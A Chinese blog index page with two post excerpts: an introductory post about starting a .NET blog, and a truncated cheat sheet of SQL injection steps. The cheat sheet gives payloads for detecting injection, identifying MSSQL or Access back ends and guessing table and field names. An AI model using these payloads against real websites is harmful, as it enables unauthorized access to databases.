Swane's blog

摘要： 1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符’and [查询条件] and ”=’4.搜索时没过滤参数的’and [查询条件] and ‘%25′=’5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access6.猜数据库 ;and (select Count(*) from [数据库名])>07.猜字段 ;and (select Count(字 阅读全文

摘要： 作为swane在博客园开博了，之前在百度开的但是因为相关的一些因素，百度不是我理想的归宿，今天选择了这里，希望记录我之于net的点滴 阅读全文